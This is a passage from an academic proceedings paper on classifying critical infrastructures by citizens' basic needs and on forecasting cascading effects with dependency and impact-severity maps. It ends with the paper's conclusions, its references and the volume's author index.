of infrastructures to be classified as critical. It lacks in considering coverage evaluation, which means that all infrastructures related to a need are defined critical, independent of their coverage. Further, we observe that criticality criteria define CIs and not critical networks of infrastructures, which means that dependencies are to be evaluated on the basis of criticality to be satisfied. Obviously, it is possible to define several other criteria for criticality identification. Any of these approaches can be used depending on the kind of analysis we want to perform (ex-ante, ex-post, etc), but the overall judgment has to take into account the possibility to apply them in a repeatable, reliable way providing the same result when applied to the same taxonomy and to the same scenario in different time instants or in different geographical sites. Measurement methods of such criteria have to be identified and standardized to guarantee fairness.
4
From Resource Classification to Evaluation of Cascading Effects
The continuity of essential services cannot be guaranteed by selecting and protecting single infrastructures; a systematic analysis of dependencies existing among various critical infrastructures must be carried out. This allows both to outline the patterns of possible cascading effects and to provide useful information to define a central coordination strategy, aiming at minimizing the effects of dependencies among items. The study of dependencies can be split in two analysis steps, followed by a synthesis one. Once Critical infrastructures have been identified adopting the selected criticality criterion, it is to be noted that the continuity of essential services cannot be guaranteed by protecting single infrastructures: a systematic analysis of dependencies existing among various critical infrastructures must be carried out. This allows both to outline the patterns of possible cascading effects and to provide useful information to define a central coordination strategy, aiming at minimizing the effects of dependencies among items. The study of dependencies can be split in two analysis steps, followed by a synthesis one. The first analysis step, the sectoral one, is carried out by the operators of infrastructures providing a given item; they know all the actual causes that could lead to the impossibility to use the item itself. A first output of this analysis will be a rough indication of the dependencies from other items; the dependencies can be represented as an array, as shown in the Fig. 2, sketching the dependencies of the item j from the other n items. A second output of the first step will be, as shown in Fig.3.1, a discrete indication at different time of the impact severity due to the disruption induced on the item j as a result of
Fig. 2. Item dependencies array
392
L. Franchina et al.
Fig. 3. Time evolution of impact severity
Fig. 4. Cascading effect forecasting maps on a predefined geographical scale
a breakdown of different items in the columns. The arrays showed in the figure make a photograph of the evolution over time, on a predefined geographical scale, of the impact severity (represented by four different values) of the disruption induced by the items in the columns on the observed item j. In Fig.3-1, the dashed square means that a breakdown of item 1 causes low consequence only on item j after 4 and 24 hours. After 4 days, however, the same square turns into light grey, meaning that in this time frame the breakdown of item 1 causes medium severity damages to the availability of item 1. Eventually, after 4 weeks the same square turns into black, meaning that the severity of the impact on item j of a breakdown of item 1 has become critical. Similar consideration and array-based tools can be adopted to represent replaceability of item that affect the correct operation of the item under observation or the evolution in time of the impacted geographical area. In the second analysis step, the results of the sectoral analysis will be used for a holistic analysis, aimed at outlining, in a single view the overall items dependencies by all other items. To this end, matrix-based tools will be used, such for example synthetic maps of time evolution of impact severity, as shown in Fig.3.2. Similarly to Fig.3.1, the matrixes show in the Fig.3.2 make a photograph of the evolution over time of the impact severity for all items. Further, similar maps can be drawn to represent replaceability of items as a function of time and cost or the evolution in time of the impacted geographical area. As a final synthesis step of the proposed process, utilizing all the gathered information, it will be possible to build cascading effects forecasting maps. This tool is fundamental in the prevention and management of emergency, helping in taking fast decisions allowing to avoid or bound the impact of possible breakdowns of an item on other items. The fig.4 shows the time evolution, in 4 hours, 24 hours, 4 days, 4 weeks time frames, of the cascading effect following the lack
An Effective Approach for Cascading Effects Prevision
393
of the item x at time t0: this representation might be provided for all items and for all geographical scale of interest.
5
Conclusions
In this paper an approach to classify critical infrastructures starting from citizenship basic needs has been described, and a methodology to outline interdependencies and foresee possible cascading effects has been presented. By means of the proposed methodology, it will be possible to detect the major criticalities in each context, in order to address the efforts and countermeasures to prevent the occurrence of cascading effects among infrastructures. Due to the heuristic nature of the methodology, a further effort is requested to accurately classify resources, items and components, and to tune the criticality thresholds. This work can only be done with the contribution of specific sector skills.
References [1] Lewis, T.G.: Critical Infrastructure Protection in Homeland Security Defending a Networked Nation. John Wiley & Sons, Chichester (2006) [2] Hyslop, M.: Critical Information Infrastructures Resilience and Protection. Springer Science+Business Media, Heidelberg (2007) [3] ISO/IEC 15408, Common Criteria for Information Technology Security Evaluation, Part 1 Introduction and general model, version 2.3, part 1 (August 2005) [4] ISO 27001, Information Security Management - Specification With Guidance for Use (October 2005) [5] National Strategy for Homeland Security (October 2007), http://www.dhs.gov/xlibrary/assets/nat_strat_homelandsecurity_2007.pdf [6] Proposal for a Directive of the Council on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection, Bruxelles, 22/05/2008 [7] Best Practices for Improving CIIP in Collaboration of Governmental Bodies with Operators of Critical Information Infrastructures [8] Maslow, A.: Motivation and Personality. Harper, NY (1954)
Author Index
Abou El Kalam, Anas 95 Albrechtsen, Eirik 235 Ali, Manou 190 Asplund, Mikael 258 Assogna, Pierluigi 368
Fioriti, Vincenzo 14 Flammini, Francesco 180, 336 Fovino, Igor Nai 211, 271 Franceschinis, Giuliana 48 Franchina, Luisa 386
Baldini, Gianmarco 271 Batista Jr., Aguinaldo B. 200 Beccuti, Marco 48 Beitollahi, Hakem 223 Bertocchi, Glauco 368 Beyel, C´esaire 36 Blackwell, Joshua 24, 352 Bobbio, Andrea 328 Bompard, Ettore 144 Brito Jr., Agostinho M. 200 Buschmann, Robert 119
Gadomski, Adam Maria 319 Gaglione, Andrea 180 Galli, Emanuele 72 Garrone, Fabrizio 223 Geretshuber, Stefan 119 Gonzalez, Jose J. 295 Gratta, Laura 386 Gribaudo, Marco 328 Gustavsson, Rune 84
Cadini, Francesco 155 Carbonelli, Marco 386 Carcano, Andrea 211 Casalicchio, Emiliano 72 Castorini, Elisa 14 Cerotti, Davide 328 Chiaradonna, Silvano 60 Cruz, Edite 302 D’Antonio, Salvatore 109 Deconinck, Geert 223 Dellwing, Hermann 119 Deswarte, Yves 95 Di Giandomenico, Felicita 60 DiCarlo, Antonio 368 Dionisi, Carla 1 Donatelli, Susanna 311 Dondossola, Giovanna 223 dos Santos, Selan R. 168 Eliades, Demetrios G.
360
Felkner, Anna 344 Fern´ andez, Marcel 287 Fickert, Lothar 376 Filho, Jos´e Macedo F. 200
Jaatun, Martin Gilje 235 Johnsen, Stig Ole 235 Johnson, E. Wray 24 Kaˆ aniche, Mohamed 48 Kanoun, Karama 48 Khelil, Abdelmajid 109 Kivimaa, J¨ uri 279 Klaver, Marieke 302 Klein, R¨ udiger 36, 131 Kobayashi, Tiago H. 200 Kozakiewicz, Adam 344 Kruk, Tomasz Jordan 344 Lee, Seok-Won 24, 352 Leick, Claus 119 Line, Maria B. 235 Linnemann, Ralf 36 Lollini, Paolo 60 Longva, Odd Helge 235 Luiijf, Eric 190, 302 Malleck, Helmut 376 Marchei, Elena 14 Mariani, Francesca 1 Marsh, Lydia 24, 352 Masera, Marcelo 144, 211 Mazzocca, Nicola 180, 336 Medeiros, Jo˜ ao Paulo S. 168, 200
396
Author Index
Milicchio, Franco 368 Motta Pires, Paulo S. 200
Suri, Neeraj 109 Sveen, Finn Olav 247, 295
Nadjm-Tehrani, Simin 258 Napoli, Roberto 144 Nieuwenhuijs, Albert 302
Tolone, William J. 24, 352 Tom` as-Buliart, Joan 287 Tøndel, Inger Anne 235 Torres, Jose Manuel 247, 295 Trombetta, Alberto 211 Tucci, Salvatore 72 Tyugu, Enn 279
Ojamaa, Andres
279
Paoluzzi, Alberto 368 Perucchini, Daniele 386 Petrescu, Cristina-Andreea 155 Petricca, Claudio 386 Polycarpou, Marios M. 360 Pragliola, Concetta 180, 336 Recchioni, Maria Cristina Reinhardt, Wolf 36 Romano, Luigi 109 Rome, Erich 36 Rosato, Vittorio 14 Ruzzante, Silvia 14
Usov, Andrij
36
van Eeten, Michel 302 Vicentino, Michele 368 Vittorini, Valeria 336
1
Sarriegi, Jose Maria 247, 295 Schwaegerl, Christine 119 Scorzelli, Giorgio 368 Seifert, Olaf 119 Sigholm, Johan 258 Soriano, Miguel 287 St˚ ahl, Bj¨ orn 84
Wakolbinger, Christian Wærø, Irene 235 Xiang, Wei-Ning Xue, Fei 144 Yeager, Cody
376
24, 352
24
Zielstra, Annemarie 190 Zimny, Tomasz Adam 319 Zio, Enrico 155 Zirilli, Francesco 1 Zollo, Roberto 368